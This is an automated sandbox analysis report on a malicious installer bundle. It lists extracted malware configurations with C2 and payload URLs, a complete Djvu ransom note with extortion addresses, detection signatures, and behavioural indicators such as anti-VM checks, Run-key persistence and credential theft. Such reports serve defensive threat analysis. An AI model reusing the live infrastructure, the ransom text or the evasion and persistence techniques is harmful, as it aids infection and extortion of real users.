Resubmissions
28-03-2022 07:58
220328-jty77adcdp 1025-03-2022 09:29
220325-lf232adhh3 125-03-2022 09:16
220325-k8tfxsaddl 1024-03-2022 20:10
220324-yx6trsdgg5 121-03-2022 09:00
220321-kyfgbaafh9 1021-03-2022 08:57
220321-kw1dpsafg5 420-03-2022 10:09
220320-l64pjscaen 1019-03-2022 11:38
220319-nr4gcaghhr 10Analysis
-
max time kernel
271s -
max time network
384s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
17-03-2022 18:18
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win10-20220310-en
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win10v2004-en-20220113
General
-
Target
setup_x86_x64_install.exe
-
Size
6.2MB
-
MD5
d2f0cfac1c354f041c7b243f3df94d0a
-
SHA1
dfc03d06e799018485dc2dd72f997a0fef3d83a1
-
SHA256
3faadb2356253a3c76b42691c13dd3c05b0df75fbf543041bd7afc478b9a838c
-
SHA512
ed4b434001a16e0d81d59a5be9a26d31be8fb518ddc9e98dd22ca031761ab88ec9d4d479f11b2c0febfb90960061159836c806952d9e0c5cf9239654a5b7e6d6
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
vidar
40.6
706
https://dimonbk83.tumblr.com/
-
profile_id
706
Extracted
redline
ANI
45.142.215.47:27643
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
djvu
http://fuyt.org/test3/get.php
-
extension
.xcbg
-
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
-
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn
Signatures
-
Detected Djvu ransomware 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4892-365-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4892-366-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4892-368-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4660 4500 rundll32.exe -
RedLine 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4696-222-0x0000000000400000-0x0000000000422000-memory.dmp RedLine -
RedLine Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4696-222-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral2/memory/4216-267-0x0000000000270000-0x00000000003DB000-memory.dmp family_redline behavioral2/memory/4216-269-0x0000000000270000-0x00000000003DB000-memory.dmp family_redline behavioral2/memory/4992-280-0x0000000000650000-0x00000000007BD000-memory.dmp family_redline behavioral2/memory/4216-283-0x0000000000270000-0x00000000003DB000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02dc626f48.exe Socelars C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02dc626f48.exe Socelars -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02dc626f48.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02dc626f48.exe family_socelars -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
Avvelenate.exe.pifdescription pid process target process PID 4416 created 3020 4416 Avvelenate.exe.pif Explorer.EXE -
Vidar 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1828-210-0x0000000000400000-0x00000000017ED000-memory.dmp Vidar behavioral2/memory/1828-229-0x00000000034A0000-0x0000000003574000-memory.dmp Vidar -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Djvu 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4892-365-0x0000000000400000-0x0000000000537000-memory.dmp Djvu behavioral2/memory/4892-366-0x0000000000400000-0x0000000000537000-memory.dmp Djvu behavioral2/memory/4892-368-0x0000000000400000-0x0000000000537000-memory.dmp Djvu -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
OnlyLogger Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3624-213-0x0000000002CC0000-0x0000000002D08000-memory.dmp family_onlylogger behavioral2/memory/3624-214-0x0000000000400000-0x0000000002B6B000-memory.dmp family_onlylogger -
Smokeloader2018 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3020-236-0x0000000003120000-0x0000000003135000-memory.dmp Smokeloader2018 -
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1828-210-0x0000000000400000-0x00000000017ED000-memory.dmp family_vidar behavioral2/memory/1828-229-0x00000000034A0000-0x0000000003574000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 3 IoCs
Processes:
cmd.exerundll32.exerundll32.exeflow pid process 205 4992 cmd.exe 224 4516 rundll32.exe 321 5388 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeTue0289c99651.exeTue02976fcdf1.exeTue02dc626f48.exeTue028a363eda.exeTue02705f9c2b455.exeTue02522f9ea0b1.exeTue02b2110095fe706.exeTue026e182673.exeTue026e94a5005f8.exeTue029560e6534e190c.exeTue02520f255d0ba43a.exeTue02b2110095fe706.tmpTue026e94a5005f8.exet2y2IyXDHgdSnEi_aVjgEuJo.exeHiBTZE6Gv4KxjmirFmay03bJ.exeOWJw6KtR2NwUoYenThY2ECt7.exe6zYhJZFz7hGRxH5AOfPbfb1q.exePhsHMlF6tpL4cItkeiIXvtL7.exe4B3of8v9JlXMrHyDZ8ywGtP7.exeLzmwAqmV.exeIYEx72bTlmcph7YqkziCwtDG.exefN_PuiaPiDkjEZnsupuHGsck.exeeMd30NO5w6CXpLgXXFSPbQav.execmd.exeC3TEUj3w0my3sG6vseSS1ODk.exemMCADPue24qpppaQrsAjgFjD.exeEeyZAYeCN3aiMcSvuVipi9sT.exeX6dtQACQioqiebfEUtPmI4ox.exetimeout.exeFmzEkQeE092RvzJXs6o8zx5r.exeInstall.exef3t_lQbSoGh1nC6Koq2DOK1A.exeInstall.exeiyYRA2zjB7qX2F6ikmR6SV3S.exenXFeAbvXLg7Hi4X0yNObClwf.exebt6RuJUGA2_XYKNjgPQ5G4KD.exegsqNVzo3JRFSA0n3M3dgMnUr.exe6AMZrD3zpEI3XVpw_LFdRZFT.exe43iKPl1AdRKm4gLJtv_LcXoy.exeQ9_E6thG7mij2_I43zmvk8Rh.exeextd.exeextd.exeInstall.exedtufvra6LMUTF51wzLnUCA_NSsUzVYC.exeInstall.exeTrdngAnlzr1649.exeWerFault.exezhangyan.exeSta.exe.pif4460_1647529798_1063.exerundll32.exe7929_1647444188_3653.exe82E1H.exe1245_1647445154_9529.exezhangyan.exeexplorer.exeHLA0C.exepowershell.EXED0826.exeinst200.exepid process 2368 setup_installer.exe 2088 setup_install.exe 3888 Tue0289c99651.exe 1632 Tue02976fcdf1.exe 3004 Tue02dc626f48.exe 1560 Tue028a363eda.exe 3120 Tue02705f9c2b455.exe 1664 Tue02522f9ea0b1.exe 3932 Tue02b2110095fe706.exe 3624 Tue026e182673.exe 2188 Tue026e94a5005f8.exe 1828 Tue029560e6534e190c.exe 4264 Tue02520f255d0ba43a.exe 4284 Tue02b2110095fe706.tmp 4696 Tue026e94a5005f8.exe 4424 t2y2IyXDHgdSnEi_aVjgEuJo.exe 2396 HiBTZE6Gv4KxjmirFmay03bJ.exe 1176 OWJw6KtR2NwUoYenThY2ECt7.exe 4216 6zYhJZFz7hGRxH5AOfPbfb1q.exe 4704 PhsHMlF6tpL4cItkeiIXvtL7.exe 4828 4B3of8v9JlXMrHyDZ8ywGtP7.exe 1692 LzmwAqmV.exe 932 IYEx72bTlmcph7YqkziCwtDG.exe 4400 fN_PuiaPiDkjEZnsupuHGsck.exe 1140 eMd30NO5w6CXpLgXXFSPbQav.exe 4992 cmd.exe 5068 C3TEUj3w0my3sG6vseSS1ODk.exe 2920 mMCADPue24qpppaQrsAjgFjD.exe 4964 EeyZAYeCN3aiMcSvuVipi9sT.exe 4880 X6dtQACQioqiebfEUtPmI4ox.exe 1816 timeout.exe 3124 FmzEkQeE092RvzJXs6o8zx5r.exe 2496 Install.exe 4892 f3t_lQbSoGh1nC6Koq2DOK1A.exe 3156 Install.exe 3100 iyYRA2zjB7qX2F6ikmR6SV3S.exe 5008 nXFeAbvXLg7Hi4X0yNObClwf.exe 5052 bt6RuJUGA2_XYKNjgPQ5G4KD.exe 4296 gsqNVzo3JRFSA0n3M3dgMnUr.exe 1172 6AMZrD3zpEI3XVpw_LFdRZFT.exe 5008 nXFeAbvXLg7Hi4X0yNObClwf.exe 3132 43iKPl1AdRKm4gLJtv_LcXoy.exe 4132 Q9_E6thG7mij2_I43zmvk8Rh.exe 5012 extd.exe 3404 extd.exe 4304 Install.exe 4868 dtufvra 4740 6LMUTF51wzLnUCA_NSsUzVYC.exe 1400 Install.exe 1848 TrdngAnlzr1649.exe 1708 WerFault.exe 4092 zhangyan.exe 5224 Sta.exe.pif 5236 4460_1647529798_1063.exe 5388 rundll32.exe 5488 7929_1647444188_3653.exe 5596 82E1H.exe 5648 1245_1647445154_9529.exe 5732 zhangyan.exe 5740 explorer.exe 5892 HLA0C.exe 5932 powershell.EXE 6060 D0826.exe 6124 inst200.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue0289c99651.exe vmprotect C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue0289c99651.exe vmprotect behavioral2/memory/3888-179-0x0000000140000000-0x0000000140650000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exeWerFault.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 24 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
iyYRA2zjB7qX2F6ikmR6SV3S.exeInstall.exe4B3of8v9JlXMrHyDZ8ywGtP7.exeInstall.exewin.exewin.exeeMd30NO5w6CXpLgXXFSPbQav.exeOWJw6KtR2NwUoYenThY2ECt7.exeIYEx72bTlmcph7YqkziCwtDG.exesetup.tmpwin.exe4D92.exeLzmwAqmV.exeHiBTZE6Gv4KxjmirFmay03bJ.exe6AMZrD3zpEI3XVpw_LFdRZFT.exe6LMUTF51wzLnUCA_NSsUzVYC.exeanytime1.exesetup_x86_x64_install.exesetup_installer.exerundll32.exeanytime2.exeLzmwAqmV.exePhsHMlF6tpL4cItkeiIXvtL7.exezhangyan.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation iyYRA2zjB7qX2F6ikmR6SV3S.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 4B3of8v9JlXMrHyDZ8ywGtP7.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation win.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation win.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation eMd30NO5w6CXpLgXXFSPbQav.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation OWJw6KtR2NwUoYenThY2ECt7.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation IYEx72bTlmcph7YqkziCwtDG.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation setup.tmp Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation win.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 4D92.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation LzmwAqmV.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation HiBTZE6Gv4KxjmirFmay03bJ.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 6AMZrD3zpEI3XVpw_LFdRZFT.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 6LMUTF51wzLnUCA_NSsUzVYC.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation anytime1.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation setup_x86_x64_install.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation setup_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation anytime2.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation LzmwAqmV.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation PhsHMlF6tpL4cItkeiIXvtL7.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation zhangyan.exe -
Loads dropped DLL 40 IoCs
Processes:
setup_install.exeTue02b2110095fe706.tmpOWJw6KtR2NwUoYenThY2ECt7.exetaskmgr.exerundll32.exeudontsay.exesetup.tmpRoutes Installation.exeXxxLGMW.exesetup.tmpWerFault.exerundll32.exerundll32.exerundll32.exewin.exerundll32.exeSoft706.exeIYEx72bTlmcph7YqkziCwtDG.exeRoutes.exepid process 2088 setup_install.exe 2088 setup_install.exe 2088 setup_install.exe 2088 setup_install.exe 2088 setup_install.exe 2088 setup_install.exe 4284 Tue02b2110095fe706.tmp 1176 OWJw6KtR2NwUoYenThY2ECt7.exe 1332 taskmgr.exe 5156 rundll32.exe 5156 rundll32.exe 2188 udontsay.exe 2988 setup.tmp 1760 Routes Installation.exe 1760 Routes Installation.exe 1760 Routes Installation.exe 1760 Routes Installation.exe 1760 XxxLGMW.exe 5096 setup.tmp 1576 WerFault.exe 4456 rundll32.exe 4456 rundll32.exe 5388 rundll32.exe 5388 rundll32.exe 3696 rundll32.exe 3696 rundll32.exe 5564 win.exe 5564 win.exe 5304 rundll32.exe 5304 rundll32.exe 3880 Soft706.exe 3880 Soft706.exe 932 IYEx72bTlmcph7YqkziCwtDG.exe 932 IYEx72bTlmcph7YqkziCwtDG.exe 3880 Soft706.exe 3880 Soft706.exe 2548 Routes.exe 3880 Soft706.exe 2548 Routes.exe 2548 Routes.exe -
Obfuscated with Agile.Net obfuscator 3 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\OWJw6KtR2NwUoYenThY2ECt7.exe agile_net C:\Users\Admin\Pictures\Adobe Films\OWJw6KtR2NwUoYenThY2ECt7.exe agile_net behavioral2/memory/1176-265-0x0000000000A30000-0x0000000000A58000-memory.dmp agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
8860B.exeSoft706.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" 8860B.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run Soft706.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Routes = "C:\\Users\\Admin\\AppData\\Roaming\\Routes\\Routes.exe --B4lBeMRI" Soft706.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 209 api.db-ip.com 238 api.db-ip.com 118 api.db-ip.com 119 api.db-ip.com 201 ipinfo.io 202 ipinfo.io 236 ipinfo.io 17 ip-api.com 114 ipinfo.io 115 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 7 IoCs
Processes:
powershell.exepowershell.exesOpKwDq.exeInstall.exeInstall.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol sOpKwDq.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini sOpKwDq.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
6zYhJZFz7hGRxH5AOfPbfb1q.exeC3TEUj3w0my3sG6vseSS1ODk.execmd.exeWerFault.exeTrdngAnlzr1649.exe7929_1647444188_3653.exe82E1H.exeHLA0C.exeD0826.exe8860B.exeLzmwAqmV.exeLzmwAqmV.exepid process 4216 6zYhJZFz7hGRxH5AOfPbfb1q.exe 5068 C3TEUj3w0my3sG6vseSS1ODk.exe 4992 cmd.exe 1708 WerFault.exe 1848 TrdngAnlzr1649.exe 1708 WerFault.exe 5488 7929_1647444188_3653.exe 5596 82E1H.exe 5892 HLA0C.exe 6060 D0826.exe 5252 8860B.exe 1692 LzmwAqmV.exe 5468 LzmwAqmV.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Tue026e94a5005f8.exeLzmwAqmV.exeOWJw6KtR2NwUoYenThY2ECt7.exedescription pid process target process PID 2188 set thread context of 4696 2188 Tue026e94a5005f8.exe Tue026e94a5005f8.exe PID 1692 set thread context of 4892 1692 LzmwAqmV.exe f3t_lQbSoGh1nC6Koq2DOK1A.exe PID 1176 set thread context of 6012 1176 OWJw6KtR2NwUoYenThY2ECt7.exe MSBuild.exe -
Drops file in Program Files directory 5 IoCs
Processes:
setup.tmpPhsHMlF6tpL4cItkeiIXvtL7.exedescription ioc process File created C:\Program Files (x86)\AtomTweaker\unins000.dat setup.tmp File created C:\Program Files (x86)\AtomTweaker\is-9RPGD.tmp setup.tmp File opened for modification C:\Program Files (x86)\AtomTweaker\unins000.dat setup.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe PhsHMlF6tpL4cItkeiIXvtL7.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe PhsHMlF6tpL4cItkeiIXvtL7.exe -
Drops file in Windows directory 2 IoCs
Processes:
schtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe File opened for modification C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 50 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4384 2088 WerFault.exe setup_install.exe 5020 3624 WerFault.exe Tue026e182673.exe 1932 1828 WerFault.exe Tue029560e6534e190c.exe 4468 3624 WerFault.exe Tue026e182673.exe 4664 3624 WerFault.exe Tue026e182673.exe 4300 3624 WerFault.exe Tue026e182673.exe 3532 3624 WerFault.exe Tue026e182673.exe 3404 3624 WerFault.exe Tue026e182673.exe 3628 3624 WerFault.exe Tue026e182673.exe 3004 3624 WerFault.exe Tue026e182673.exe 2280 3624 WerFault.exe Tue026e182673.exe 4140 4964 WerFault.exe EeyZAYeCN3aiMcSvuVipi9sT.exe 1576 4880 WerFault.exe X6dtQACQioqiebfEUtPmI4ox.exe 2512 4964 WerFault.exe EeyZAYeCN3aiMcSvuVipi9sT.exe 1208 4880 WerFault.exe X6dtQACQioqiebfEUtPmI4ox.exe 3236 4828 WerFault.exe 4B3of8v9JlXMrHyDZ8ywGtP7.exe 1704 4892 WerFault.exe f3t_lQbSoGh1nC6Koq2DOK1A.exe 3868 4828 WerFault.exe 4B3of8v9JlXMrHyDZ8ywGtP7.exe 3328 4828 WerFault.exe 4B3of8v9JlXMrHyDZ8ywGtP7.exe 1784 4828 WerFault.exe 4B3of8v9JlXMrHyDZ8ywGtP7.exe 1848 1816 WerFault.exe 5DEw0GYq8p1VZbbph7v4UOlH.exe 3420 4828 WerFault.exe 4B3of8v9JlXMrHyDZ8ywGtP7.exe 4088 4296 WerFault.exe gsqNVzo3JRFSA0n3M3dgMnUr.exe 972 3124 WerFault.exe FmzEkQeE092RvzJXs6o8zx5r.exe 2984 4828 WerFault.exe 4B3of8v9JlXMrHyDZ8ywGtP7.exe 4976 4296 WerFault.exe gsqNVzo3JRFSA0n3M3dgMnUr.exe 4392 4828 WerFault.exe 4B3of8v9JlXMrHyDZ8ywGtP7.exe 632 3124 WerFault.exe FmzEkQeE092RvzJXs6o8zx5r.exe 5588 4296 WerFault.exe gsqNVzo3JRFSA0n3M3dgMnUr.exe 5956 5740 WerFault.exe siww1049.exe 5040 3124 WerFault.exe FmzEkQeE092RvzJXs6o8zx5r.exe 5468 4296 WerFault.exe gsqNVzo3JRFSA0n3M3dgMnUr.exe 5816 4828 WerFault.exe 4B3of8v9JlXMrHyDZ8ywGtP7.exe 5724 3624 WerFault.exe Tue026e182673.exe 1708 4296 WerFault.exe gsqNVzo3JRFSA0n3M3dgMnUr.exe 5516 3124 WerFault.exe FmzEkQeE092RvzJXs6o8zx5r.exe 1544 3624 WerFault.exe Tue026e182673.exe 2720 1388 WerFault.exe bearvpn3.exe 5656 4296 WerFault.exe gsqNVzo3JRFSA0n3M3dgMnUr.exe 3588 3124 WerFault.exe FmzEkQeE092RvzJXs6o8zx5r.exe 5040 3624 WerFault.exe Tue026e182673.exe 5132 3416 WerFault.exe 5DDF.exe 6088 3416 WerFault.exe 5DDF.exe 5776 3124 WerFault.exe FmzEkQeE092RvzJXs6o8zx5r.exe 2020 3624 WerFault.exe Tue026e182673.exe 688 3124 WerFault.exe FmzEkQeE092RvzJXs6o8zx5r.exe 4440 5404 WerFault.exe win.exe 2676 5544 WerFault.exe win.exe 456 4232 WerFault.exe Avvelenate.exe.pif 5484 4232 WerFault.exe Avvelenate.exe.pif -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Tue02522f9ea0b1.exetaskmgr.exeQ9_E6thG7mij2_I43zmvk8Rh.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Q9_E6thG7mij2_I43zmvk8Rh.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Q9_E6thG7mij2_I43zmvk8Rh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WerFault.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WerFault.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key queried 